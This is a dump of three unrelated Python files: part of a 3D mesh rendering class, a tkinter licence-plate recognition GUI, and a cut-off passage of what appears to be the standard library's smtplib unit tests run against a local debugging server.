#No color under textures or materials
if len(self.geometry.material) != 0 or self.geometry.texture is not None:
vertexEnum = 'NoColors'
else:
vertexEnum = 'FaceColors'
materials = []
#LambertMaterial is a material for non-shiny surfaces, without specular highlights.
if len(self.geometry.material) == 0: #No material or texture
material_geometry = three.MeshLambertMaterial(
map = self.getTexture(self.texture),
polygonOffset=True,
polygonOffsetFactor=1,
polygonOffsetUnits=1,
flatShading = True,
opacity = 1.,
transparent = False,
side = 'DoubleSide',
wireframe=False,
vertexColors = vertexEnum)
materials = material_geometry
else:
for m in self.geometry.material:
if self.geometry.smoothness:
material_geometry = three.MeshLambertMaterial(
map=self.getTexture(self.geometry.material[m]["map_kd"]),
color=self.color(self.geometry.material[m]["kd"]),
emissiveIntensity=self.geometry.material[m]["ke"],
specular=self.color(self.geometry.material[m]["ks"]),
shininess=self.geometry.material[m]["ns"],
transparence=self.geometry.material[m]["transparence"],
opacity=self.geometry.material[m]["opacity"],
emissiveMap=self.getTexture(self.geometry.material[m]["map_ke"]),
alphaMap=self.getTexture(self.geometry.material[m]["map_d"]),
specularMap=self.getTexture(self.geometry.material[m]["map_ks"]),
bumpMap=self.getTexture(self.geometry.material[m]["bump"]),
normalMap=self.getTexture(self.geometry.material[m]["norm"]),
refractionRatio=self.geometry.material[m]["ni"]
)
else:
material_geometry = three.MeshPhongMaterial(
map = self.getTexture(self.geometry.material[m]["map_kd"]),
color = self.color(self.geometry.material[m]["kd"]),
emissiveIntensity = self.geometry.material[m]["ke"],
specular = self.color(self.geometry.material[m]["ks"]),
shininess =self.geometry.material[m]["ns"],
transparence = self.geometry.material[m]["transparence"],
opacity = self.geometry.material[m]["opacity"],
emissiveMap = self.getTexture(self.geometry.material[m]["map_ke"]),
alphaMap = self.getTexture(self.geometry.material[m]["map_d"]),
specularMap = self.getTexture(self.geometry.material[m]["map_ks"]),
bumpMap = self.getTexture(self.geometry.material[m]["bump"]),
normalMap = self.getTexture(self.geometry.material[m]["norm"]),
refractionRatio = self.geometry.material[m]["ni"]
)
materials.append(material_geometry)
mesh1 = three.Mesh(
geometry=drawable_geometry,
material=materials,
position=[0, 0, 0]
)
return mesh1
def run(self, geometry):
edges = self.geometry.vertices[self.geometry.as_edges_flat()].astype(np.float32)
self.wireframe.geometry.attributes['position'].array = edges
#initilization of the color
self.geometry_color = self.__initialize_geometry_color(None, geometry)
if self._color_map is None:
self.update_internal_color(self._internal_color, geometry)
self.update_external_color(self._external_color, geometry)
elif self._label_colors is not None:
self.update_color_label(geometry)
else:
self.compute_color_map(self._metric_string, self._c_map_string, geometry)
if self.queue:
self.queue = False
self.updating = False
self.update()
else:
self.updating = False
def update(self):
if (not self.updating):
self.updating = True
thread = threading.Thread(target=self.run, args=(self.geometry.copy(),))
thread.daemon = True
thread.start()
else:
self.queue = True
@property
def center(self):
return self.geometry.center
@property
def scale(self):
return self.geometry.scale
|
surface.py
|
import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
class Surface(ttk.Frame):
pic_path = ""
viewhigh = 600
viewwide = 600
update_time = 0
thread = None
thread_run = False
camera = None
color_transform = {"green":("绿牌","#55FF55"), "yello":("黄牌","#FFFF00"), "blue":("蓝牌","#6666FF")}
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame_left = ttk.Frame(self)
frame_right1 = ttk.Frame(self)
frame_right2 = ttk.Frame(self)
win.title("车牌识别")
win.state("zoomed")
self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
frame_left.pack(side=LEFT,expand=1,fill=BOTH)
frame_right1.pack(side=TOP,expand=1,fill=tk.Y)
frame_right2.pack(side=RIGHT,expand=0)
ttk.Label(frame_left, text='原图:').pack(anchor="nw")
ttk.Label(frame_right1, text='车牌位置:').grid(column=0, row=0, sticky=tk.W)
from_pic_ctl = ttk.Button(frame_right2, text="来自图片", width=20, command=self.from_pic)
from_vedio_ctl = ttk.Button(frame_right2, text="来自摄像头", width=20, command=self.from_vedio)
self.image_ctl = ttk.Label(frame_left)
self.image_ctl.pack(anchor="nw")
self.roi_ctl = ttk.Label(frame_right1)
self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
ttk.Label(frame_right1, text='识别结果:').grid(column=0, row=2, sticky=tk.W)
self.r_ctl = ttk.Label(frame_right1, text="")
self.r_ctl.grid(column=0, row=3, sticky=tk.W)
self.color_ctl = ttk.Label(frame_right1, text="", width="20")
self.color_ctl.grid(column=0, row=4, sticky=tk.W)
from_vedio_ctl.pack(anchor="se", pady="5")
from_pic_ctl.pack(anchor="se", pady="5")
self.predictor = predict.CardPredictor()
self.predictor.train_svm()
def get_imgtk(self, img_bgr):
img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
im = Image.fromarray(img)
imgtk = ImageTk.PhotoImage(image=im)
wide = imgtk.width()
high = imgtk.height()
if wide > self.viewwide or high > self.viewhigh:
wide_factor = self.viewwide / wide
high_factor = self.viewhigh / high
factor = min(wide_factor, high_factor)
wide = int(wide * factor)
if wide <= 0 : wide = 1
high = int(high * factor)
if high <= 0 : high = 1
im=im.resize((wide, high), Image.ANTIALIAS)
imgtk = ImageTk.PhotoImage(image=im)
return imgtk
def show_roi(self, r, roi, color):
if r :
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
roi = Image.fromarray(roi)
self.imgtk_roi = ImageTk.PhotoImage(image=roi)
self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
self.r_ctl.configure(text=str(r))
self.update_time = time.time()
try:
c = self.color_transform[color]
self.color_ctl.configure(text=c[0], background=c[1], state='enable')
except:
self.color_ctl.configure(state='disabled')
elif self.update_time + 8 < time.time():
self.roi_ctl.configure(state='disabled')
self.r_ctl.configure(text="")
self.color_ctl.configure(state='disabled')
def from_vedio(self):
if self.thread_run:
return
if self.camera is None:
self.camera = cv2.VideoCapture(0)
if not self.camera.isOpened():
mBox.showwarning('警告', '摄像头打开失败!')
self.camera = None
return
self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
self.thread.setDaemon(True)
self.thread.start()
self.thread_run = True
def from_pic(self):
self.thread_run = False
self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("jpg图片", "*.jpg")])
if self.pic_path:
img_bgr = predict.imreadex(self.pic_path)
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
resize_rates = (1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4)
for resize_rate in resize_rates:
print("resize_rate:", resize_rate)
r, roi, color = self.predictor.predict(img_bgr, resize_rate)
if r:
break
#r, roi, color = self.predictor.predict(img_bgr, 1)
self.show_roi(r, roi, color)
@staticmethod
def vedio_thread(self):
self.thread_run = True
predict_time = time.time()
while self.thread_run:
_, img_bgr = self.camera.read()
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
if time.time() - predict_time > 2:
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
predict_time = time.time()
print("run end")
def close_window():
print("destroy")
if surface.thread_run :
surface.thread_run = False
surface.thread.join(2.0)
win.destroy()
if __name__ == '__main__':
win=tk.Tk()
surface = Surface(win)
win.protocol('WM_DELETE_WINDOW', close_window)
win.mainloop()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
